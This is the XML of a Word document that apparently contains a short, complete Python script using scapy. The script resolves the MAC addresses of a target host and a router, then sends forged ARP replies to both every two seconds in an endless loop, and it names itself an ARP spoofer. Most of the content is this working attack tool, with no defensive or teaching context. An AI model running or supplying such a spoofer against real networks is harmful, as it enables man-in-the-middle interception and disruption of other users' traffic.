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248AFC" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t>#! /bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F4CF80" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>scapy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04C90ED6" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304AD71A" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422AC31F" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A"/>
    <w:p w14:paraId="7D8C602D" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>get_mac_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>ip_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5293B0" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>broadcast_layer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>scapy.Ether</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>ff:ff:ff:ff:ff:ff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F88BCC" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>arp_layer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>scapy.ARP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>pdst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>ip_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6117E82D" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>get_mac_packet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>broadcast_layer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>arp_layer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D32E2BB" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">    answer = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>scapy.srp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>get_mac_packet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>, timeout=2, verbose=False)[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54311EB6" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">    return </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>answer[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>0][1].</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>hwsrc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B7412D7" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F03C36F" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>spoof(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>router_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>router_mac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>target_mac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6D4095" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">    packet1 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>scapy.ARP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">op=2, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>hwdst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>router_mac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>pdst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>router_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>psrc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00536402" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">    packet2 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>scapy.ARP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">op=2, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>hwdst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>target_mac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>pdst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>psrc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>router_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3045F8" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>scapy.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>(packet1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F8F923" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>scapy.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>(packet2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127A84D9" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01472951" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve"> = str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>sys.argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>[2])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2208A98C" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>router_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve"> = str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>sys.argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>[1])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415D1E47" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>target_mac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve"> = str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>get_mac_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5F5489" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>router_mac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve"> = str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>get_mac_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>router_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603AD98B" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A"/>
    <w:p w14:paraId="4CB8982A" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B267F6" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">    while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374B2701" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>spoof(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>router_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>router_mac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>target_mac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592414A6" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>time.sleep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5839027D" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">except </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>KeyboardInterrupt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E215B9D" w14:textId="77777777" w:rsidR="000A092A" w:rsidRPr="00B1669E" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>'Closing Arp Spoofer')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C46696" w14:textId="77777777" w:rsidR="000A092A" w:rsidRDefault="000A092A" w:rsidP="000A092A">
      <w:r w:rsidRPr="00B1669E">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>exit(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1669E">
        <w:t>0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D13403D" w14:textId="77777777" w:rsidR="004629F1" w:rsidRDefault="004629F1"/>
    <w:sectPr w:rsidR="004629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92A"/>
    <w:rsid w:val="000A092A"/>
    <w:rsid w:val="00462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915DE2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{958AC472-A6B0-7A47-ADA0-E2485443B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9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2023-01-04T11:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-04T11:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>